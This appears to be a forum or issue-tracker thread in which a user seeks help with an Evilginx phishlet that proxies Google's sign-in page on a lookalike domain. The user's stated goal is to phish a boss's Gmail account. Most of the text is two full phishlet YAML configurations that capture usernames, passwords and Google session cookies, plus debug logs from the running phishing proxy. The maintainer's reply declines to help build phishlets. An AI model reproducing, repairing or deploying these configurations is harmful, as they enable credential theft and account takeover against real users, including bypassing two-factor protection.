Certificate issue? help!

[thecityofhereafter]

So I've figured out that my yaml file works.

If I leave phish_sub blank (so the certificate does NOT match) and click through "visit this site anyway" it will log credentials and session.

If I change phish_sub back to "accounts" it stalls after hitting "submit" username.

I know you can't help with the yaml file, but can I get a hint? is this because the original log-in page is trying to reach out to some other page not listed in the encryption certificate?

I used burpsuite to pick out every url for the auth process and cookies.. I'm not really sure what I'm doing wrong here, I've tried 10 different yaml files for this particular site, and each one behaves the same way for me?

Thanks, GM.

[thecityofhereafter]

This is in reference to a phishlet for google/gmail. I've tried all of the various attempts on the issue tracker along with combinations of my own, but they all seem to behave this way for me.

My boss is going to give me a raise if I can manage to phish my way into his gmail account, so I'm pretty determined here. I'd be willing to donate a few bucks to the project if someone could help me get this going, I've been able to make my own phishlets for a few other sites without any problems.

I've tried setting up records for certbot in my domain config so I can use wildcard certs on the subdomains, but that didn't seem to get around the issue I'm facing here. I'm about to pay a good chunk of change for a top level wildcard cert just to see if it helps, would be happier to put it towards the project and author instead.

Thanks, GM.

[kgretzky]

I can help you with specific error that you're getting if evilginx is not working as it should, but I am not able to help in creation of phishlets.

[thecityofhereafter]

Hey Kuba!

Thank You soo much for the replies! I had lost hope and tried switching to Modlishka but didn't have much luck there either. Ironically I had pretty much identical issues.

I'm going to give all your suggestions a try now. Thank You soo much.

I'll report back ASAP.

[thecityofhereafter]

I have what SHOULD be a working phishlet for the site in question, but I am still having issues with some weird domain name appends. It keeps appending verify.computer to the FQDN and giving me "hostname unsupported for accounts.google.com.verify.computer.verify.computer" I know you cant help with phishlets, and I understand entirely your reason for not releasing a phishlet for this particular site, but I am getting the same errors/behaviour no matter what phishlet I use, I did try deleting the crt folder and recreating the lures, it helped with some issues, but this one still remains. I have 2 yaml files for this site I have been trying, one from elktarni that is supposed to work, and one of my own that I created from scratch with a lot more triggers and some javascript to work through the push notifications issue, both seem to behave the same way...

For example: [20:50:12] [imp] [0] [google] new visitor has arrived: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.39 Safari/537.36 (104.34.29.226) [20:50:12] [inf] [0] [google] landing URL: https://accounts.google.com.verify.computer/gAtQsXdW [20:50:12] [dbg] redirect URL (lure): [20:50:12] [dbg] whitelistIP: 104.34.29.226 54683d1caa68854d3e48d1a69b551e5bbf152acd783bf22c4a5810b5c5e3f104 [20:50:12] [dbg] whitelistIP: 104.34.29.226 54683d1caa68854d3e48d1a69b551e5bbf152acd783bf22c4a5810b5c5e3f104 [20:50:12] [dbg] POST: /signin/v2/identifier [20:50:12] [dbg] accounts.google.com: GAPS = 1:81RmsTT3w8RCnHhVjBj7J6OaL6COQQ:kvoodQy9L7DdJJw6 [20:50:12] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:13] [dbg] whitelistIP: 104.34.29.226 54683d1caa68854d3e48d1a69b551e5bbf152acd783bf22c4a5810b5c5e3f104 [20:50:13] [dbg] POST: /ServiceLogin [20:50:13] [dbg] accounts.google.com: GAPS = 1:Ddw0OC1DHmT6vMM9xbfDzpIQ9ku1JA:pqHh1xiPxcp18ehn [20:50:13] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:13] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:14] [dbg] DNS A: www.google.com.verify.computer. = 68.183.20.115 [20:50:15] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:15] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:22] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:22] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:25] [dbg] DNS A: accounts.google.com.verify.computer. = 68.183.20.115 [20:50:25] [dbg] DNS A: google.com.verify.computer. = 68.183.20.115 [20:50:25] [dbg] DNS A: accounts.google.com.verify.computer. = 68.183.20.115 [20:50:26] [dbg] isWhitelistIP: 46.105.100.220 [20:50:26] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (python-requests/2.18.4) [46.105.100.220] [20:50:35] [dbg] DNS A: accounts.google.com.verify.computer. = 68.183.20.115 [20:50:36] [dbg] isWhitelistIP: 3.88.239.114 [20:50:36] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko) [3.88.239.114] [20:50:36] [dbg] DNS A: accounts.google.com.verify.computer. = 68.183.20.115 [20:50:36] [dbg] DNS A: drive.google.com.verify.computer. = 68.183.20.115 [20:50:36] [dbg] DNS A: accounts.google.com.verify.computer. = 68.183.20.115 [20:50:36] [dbg] isWhitelistIP: 3.88.239.114 [20:50:36] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko) [3.88.239.114] [20:50:39] [dbg] isWhitelistIP: 46.105.100.220 [20:50:39] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (python-requests/2.18.4) [46.105.100.220] [20:50:42] [dbg] DNS A: fonts.google.com.verify.computer. = 68.183.20.115 [20:50:43] [dbg] isWhitelistIP: 46.105.100.220 [20:50:43] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (python-requests/2.18.4) [46.105.100.220] [20:50:43] [dbg] DNS A: google.com.verify.computer. = 68.183.20.115 [20:50:43] [dbg] DNS A: accounts.google.com.verify.computer. = 68.183.20.115 [20:50:44] [dbg] DNS A: ogs.google.com.verify.computer. = 68.183.20.115 [20:50:45] [dbg] isWhitelistIP: 195.242.213.154 [20:50:45] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko) [195.242.213.154] [20:50:47] [dbg] DNS A: play.google.com.verify.computer. = 68.183.20.115 [20:50:47] [dbg] DNS A: ogs.google.com.verify.computer. = 68.183.20.115 [20:50:47] [dbg] DNS A: ogs.google.com.verify.computer. = 68.183.20.115 [20:50:48] [dbg] hostname unsupported: ogs.google.com.verify.computer [20:50:48] [dbg] DNS A: ogs.google.com.verify.computer. = 68.183.20.115 [20:50:48] [dbg] DNS A: ogs.google.com.verify.computer. = 68.183.20.115 [20:50:48] [dbg] hostname unsupported: ogs.google.com.verify.computer [20:50:48] [dbg] hostname unsupported: ogs.google.com.verify.computer [20:50:48] [dbg] DNS A: fonts.google.com.verify.computer. = 68.183.20.115 [20:50:48] [dbg] DNS A: fonts.google.com.verify.computer. = 68.183.20.115 [20:50:48] [dbg] hostname unsupported: ogs.google.com.verify.computer [20:50:48] [dbg] DNS A: fonts.google.com.verify.computer. = 68.183.20.115 [20:50:49] [dbg] isWhitelistIP: 195.242.213.154 [20:50:49] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko) [195.242.213.154] [20:50:49] [dbg] hostname unsupported: ogs.google.com.verify.computer [20:50:49] [dbg] isWhitelistIP: 195.242.213.154 [20:50:49] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko) [195.242.213.154] [20:50:49] [dbg] hostname unsupported: fonts.google.com.verify.computer [20:50:49] [dbg] hostname unsupported: fonts.google.com.verify.computer [20:50:49] [dbg] hostname unsupported: fonts.google.com.verify.computer [20:50:49] [dbg] hostname unsupported: fonts.google.com.verify.computer [20:50:50] [dbg] hostname unsupported: fonts.google.com.verify.computer [20:50:51] [dbg] DNS A: play.google.com.verify.computer. = 68.183.20.115 [20:50:51] [dbg] DNS A: play.google.com.verify.computer. = 68.183.20.115 [20:50:51] [dbg] DNS A: play.google.com.verify.computer. = 68.183.20.115 [20:50:51] [dbg] isWhitelistIP: 195.242.213.154 [20:50:51] [war] [google] unauthorized request: https://accounts.google.com.verify.computer/ (Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko) [195.242.213.154] [20:50:51] [dbg] hostname unsupported: play.google.com.verify.computer [20:50:51] [dbg] DNS A: play.google.com.verify.computer. = 68.183.20.115 [20:50:51] [dbg] hostname unsupported: play.google.com.verify.computer [20:50:51] [dbg] hostname unsupported: play.google.com.verify.computer [20:50:51] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:51] [dbg] hostname unsupported: accounts.google.com.verify.computer.verify.computer [20:50:51] [dbg] hostname unsupported: play.google.com.verify.computer :

` name: 'google' author: '@elk' min_ver: '2.3.0' proxy_hosts:

• {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
• {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: true, is_landing: false}
• {phish_sub: 'drive', orig_sub: 'drive', domain: 'google.com', session: false, is_landing: false} sub_filters:
• {triggers_on: 'wwww.google.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname}/accounts/', replace: 'https://{hostname}/accounts/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/ServiceLogin', replace: 'https://{hostname}/ServiceLogin', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'business.google.com', orig_sub: 'business', domain: 'google.com', search: 'https://{hostname}/add/', replace: 'https://{hostname}/add/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/ManageAccount', replace: 'https://{hostname}/ManageAccount', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/OAuthLogin', replace: 'https://{hostname}/OAuthLogin', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/Logout', replace: 'https://{hostname}/Logout', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts', replace: 'https://{hostname}/accounts', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/signup/', replace: 'https://{hostname}/accounts/signup/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/embedded/', replace: 'https://{hostname}/accounts/embedded/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/speedbump/', replace: 'https://{hostname}/accounts/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'support.google.com', orig_sub: 'support', domain: 'google.com', search: 'https://{hostname}/accounts', replace: 'https://{hostname}/accounts', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/TOS', replace: 'https://{hostname}TOS', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'sites.google.com', orig_sub: 'sites', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/v2', replace: 'https://{hostname}/signin/v2', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript']} auth_tokens:
• domain: 'accounts.google.com' keys: ['GAPS','LSID','utmt','utma','utmz','utmb','ACCOUNT_CHOOSER']
• domain: 'google.com' keys: ['SID','HSID','SSID','APISID','SAPISID','NID','OGPC','OGP','1P_JAR','CONSENT'] credentials: username: key: 'identifier' search: '(.)' type: 'post' password: key: 'password' search: '(.)' type: 'post' login: domain: 'accounts.google.com' path: '/signin/v2/identifier' landing_path:
• '/signin/v2/identifier' `

`: phishlets get-hosts google

68.183.20.115 accounts.google.com.verify.computer 68.183.20.115 mail.google.com.verify.computer 68.183.20.115 drive.google.com.verify.computer

:
`

[20:50:01] [inf] debug output enabled [20:50:01] [inf] loading phishlets from: /usr/share/evilginx/phishlets/ [20:50:02] [dbg] DNS A: apis.google.com.verify.computer. = 68.183.20.115 [20:50:02] [dbg] DNS A: lh3.google.com.verify.computer. = 68.183.20.115 [20:50:02] [dbg] DNS A: play.google.com.verify.computer. = 68.183.20.115 [20:50:02] [dbg] DNS A: ogs.google.com.verify.computer. = 68.183.20.115 [20:50:02] [dbg] DNS A: play.google.com.verify.computer. = 68.183.20.115 [20:50:02] [inf] setting up certificates for phishlet 'google'... [20:50:02] [+++] successfully set up SSL/TLS certificates for domains: [accounts.google.com.verify.computer mail.google.com.verify.computer drive.google.com.verify.computer]

Any Suggestions?

Thank You so very much! I have 4 more days left to accomplish this task if I'm going to get a raise, but I'm kind of losing hope. :(

[thecityofhereafter]

Here is the YAML file I cobbled together from other claimed functional phishlets posted in the past.

`name: 'gl' author: '@ewhit' min_ver: '2.3.0' proxy_hosts:

• {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
• {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
• {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: true, is_landing: false}
• {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false}
• {phish_sub: 'www', orig_sub: 'www', domain: 'gstatic.com', session: true, is_landing: false}
• {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: false, is_landing: false}
• {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: false, is_landing: false}
• {phish_sub: 'drive', orig_sub: 'drive', domain: 'google.com', session: false, is_landing: false}
• {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'google.com', session: true, is_landing: false}
• {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'google-analytics.com', session: false, is_landing: false}
• {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false}
• {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false}
• {phish_sub: 'ogs', orig_sub: 'ogs', domain: 'google.com', session: true, is_landing: false}
• {phish_sub: 'notifications', orig_sub: 'notifications', domain: 'google.com', session: false, is_landing: false}
• {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false}
• {phish_sub: 'accounts', orig_sub: 'accounts', domain: ‘youtube.com', session: true, is_landing: false}
• {phish_sub: 'fonts', orig_sub: 'fonts', domain: 'gstatic.com', session: false, is_landing: false}
• {phish_sub: 'lh3', orig_sub: 'lh3', domain: 'googleusercontent.com', session: false, is_landing: false}
• {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'blogger.com', session: true, is_landing: false}
• {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false}
• {phish_sub: 'www', orig_sub: 'www', domain: 'blogger.com', session: true, is_landing: false}
• {phish_sub: 'fonts', orig_sub: 'fonts', domain: 'googleapis.com', session: false, is_landing: false}
• {phish_sub: 'www', orig_sub: 'www', domain: 'google-analytics.com', session: false, is_landing: false} sub_filters:
• {triggers_on: 'ssl.gstatic.com', origsub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}accounts/static//js/k', replace: 'https://{hostname}accounts/static/_/js/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'play.google.com', orig_sub: 'play', domain: 'google.com', search: 'https://{hostname}/log', replace: 'https://{hostname}/log', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', origsub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/static//js/k', replace: 'https://{hostname}/accounts/static/_/js/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.youtube.com', orig_sub: 'accounts', domain: 'youtube.com', search: 'https://{hostname}/accounts/CheckConnection', replace: 'https://{hostname}/accounts/accounts/CheckConnection', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'fonts.gstatic.com', orig_sub: 'fonts', domain: 'gstatic.com', search: 'https://{hostname}/s/roboto/v18/', replace: 'https://{hostname}/s/roboto/v18/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'fonts.gstatic.com', orig_sub: 'fonts', domain: 'gstatic.com', search: 'https://{hostname}/s/googlesans/v9/', replace: 'https://{hostname}/s/googlesans/v9/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'lh3.googleusercontent.com', orig_sub: 'lh3', domain: 'googleusercontent.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/ServiceLogin?', replace: 'https://{hostname}/ServiceLogin?', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/sl/lookup', replace: 'https://{hostname}/_/signin/sl/lookup', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'play.google.com', orig_sub: 'play', domain: 'google.com', search: 'https://{hostname}/log', replace: 'https://{hostname}/log', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/embedded/', replace: 'https://{hostname}/accounts/embedded/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/sl/challenge', replace: 'https://{hostname}/_/signin/sl/challenge', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//common/diagnostics', replace: 'https://{hostname}/_/common/diagnostics', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/challenge', replace: 'https://{hostname}/_/signin/challenge', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/sl/challenge', replace: 'https://{hostname}/_/signin/sl/challenge', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', origsub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/static//js/k', replace: 'https://{hostname}/accounts/static/_/js/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/sl/challenge', replace: 'https://{hostname}/_/signin/sl/challenge', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/sl/challenge', replace: 'https://{hostname}/_/signin/sl/challenge', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//common/diagnostics', replace: 'https://{hostname}/_/common/diagnostics', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/challenge', replace: 'https://{hostname}/_/signin/challenge', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//common/diagnostics/', replace: 'https://{hostname}/_/common/diagnostics/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.blogger.com', orig_sub: 'accounts', domain: 'blogger.com', search: 'https://{hostname}/accounts/SetSIDFrame', replace: 'https://{hostname}/accounts/SetSIDFrame', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.youtube.com', orig_sub: 'accounts', domain: 'youtube.com', search: 'https://{hostname}/accounts/SetSIDFrame', replace: 'https://{hostname}/accounts/SetSIDFrame', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.blogger.com', orig_sub: 'www', domain: 'blogger.com', search: 'https://{hostname}/blogin.g', replace: 'https://{hostname}/blogin.g', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'fonts.googleapis.com', orig_sub: 'fonts', domain: 'googleapis.com', search: 'https://{hostname}/css', replace: 'https://{hostname}/css', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname}/css/', replace: 'https://{hostname}/css/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.blogger.com', orig_sub: 'www', domain: 'blogger.com', search: 'https://{hostname}/static/v1/v-css/', replace: 'https://{hostname}/static/v1/v-css/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.blogger.com', orig_sub: 'www', domain: 'blogger.com', search: 'https://{hostname}/static/v1/jsbin/', replace: 'https://{hostname}/static/v1/jsbin/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'fonts.googleapis.com', orig_sub: 'fonts', domain: 'googleapis.com', search: 'https://{hostname}/css', replace: 'https://{hostname}/css', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.blogger.com', orig_sub: 'www', domain: 'blogger.com', search: 'https://{hostname}/img/', replace: 'https://{hostname}/img/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.google-analytics.com', orig_sub: 'www', domain: 'google-analytics.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'lh3.googleusercontent.com', orig_sub: 'lh3', domain: 'googleusercontent.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname}/images/branding/googlelogo/svg/', replace: 'https://{hostname}/images/branding/googlelogo/svg/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'fonts.gstatic.com', orig_sub: 'fonts', domain: 'gstatic.com', search: 'https://{hostname}/s/roboto/v18/', replace: 'https://{hostname}/s/roboto/v18/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'fonts.gstatic.com', orig_sub: 'fonts', domain: 'gstatic.com', search: 'https://{hostname}/s/opensans/v15/', replace: 'https://{hostname}/s/opensans/v15/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.gstatic.com', origsub: 'www', domain: 'gstatic.com', search: 'https://{hostname}/log/og//js/k', replace: 'https://{hostname}/og/_/js/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.gstatic.com', origsub: 'www', domain: 'gstatic.com', search: 'https://{hostname}/og//ss/k', replace: 'https://{hostname}/og/_/ss/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'apis.google.com', origsub: 'apis', domain: 'google.com', search: 'https://{hostname}//scs/abc-static//js/k', replace: 'https://{hostname}//scs/abc-static/_/js/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ogs.google.com', origsub: 'ogs', domain: 'google.com', search: 'https://{hostname}/u/0//og/botguard/', replace: 'https://{hostname}/u/0/_/og/botguard/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ogs.google.com', origsub: 'ogs', domain: 'google.com', search: 'https://{hostname}/u/0//notifications/count', replace: 'https://{hostname}/u/0/_/notifications/count', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname}/js/bg/', replace: 'https://{hostname}/js/bg/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'play.google.com', orig_sub: 'play', domain: 'google.com', search: 'https://{hostname}/log', replace: 'https://{hostname}/log', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', orig_sub: 'notifications', domain: 'google.com', search: 'https://{hostname}/u/0/widget', replace: 'https://{hostname}/u/0/widget', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', origsub: 'notifications', domain: 'google.com', search: 'https://{hostname}//scs/social-static//js/k', replace: 'https://{hostname}//scs/social-static/_/js/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', origsub: 'notifications', domain: 'google.com', search: 'https://{hostname}/u/0//NotificationsOgbUi/idv/', replace: 'https://{hostname}/u/0/_/NotificationsOgbUi/idv/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', origsub: 'notifications', domain: 'google.com', search: 'https://{hostname}/u/0//idv2', replace: 'https://{hostname}/u/0/_/idv2', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'apis.google.com', orig_sub: 'apis', domain: 'google.com', search: 'https://{hostname}/js/', replace: 'https://{hostname}/js/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', origsub: 'notifications', domain: 'google.com', search: 'https://{hostname}//scs/social-static//js/k', replace: 'https://{hostname}//scs/social-static/_/js/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'apis.google.com', origsub: 'apis', domain: 'google.com', search: 'https://{hostname}//scs/abc-static//js/k', replace: 'https://{hostname}//scs/abc-static/_/js/k', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', origsub: 'notifications', domain: 'google.com', search: 'https://{hostname}/u/0//NotificationsOgbUi/jserror', replace: 'https://{hostname}/u/0/_/NotificationsOgbUi/jserror', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', orig_sub: 'notifications', domain: 'google.com', search: 'https://{hostname}/u/0/widget', replace: 'https://{hostname}/u/0/widget', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'play.google.com', orig_sub: 'play', domain: 'google.com', search: 'https://{hostname}/log', replace: 'https://{hostname}/log', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', origsub: 'notifications', domain: 'google.com', search: 'https://{hostname}/u/0//NotificationsOgbUi/data/batchexecute', replace: 'https://{hostname}/u/0/_/NotificationsOgbUi/data/batchexecute', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'play.google.com', orig_sub: 'play', domain: 'google.com', search: 'https://{hostname}/log', replace: 'https://{hostname}/log', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', orig_sub: 'notifications', domain: 'google.com', search: 'https://{hostname}/u/0/widget', replace: 'https://{hostname}/u/0/widget', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/v2/', replace: 'https://{hostname}/signin/v2/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/v2/indentifier/', replace: 'https://{hostname}/signin/v2/indentifier', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/v2/sl/', replace: 'https://{hostname}/signin/v2/sl/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/v2/challenge', replace: 'https://{hostname}/signin/v2/challenge', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/', replace: 'https://{hostname}/_/signin/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/sl/', replace: 'https://{hostname}/_/signin/sl/', mimes: ['text/html', 'application/json', 'application/javascript']}
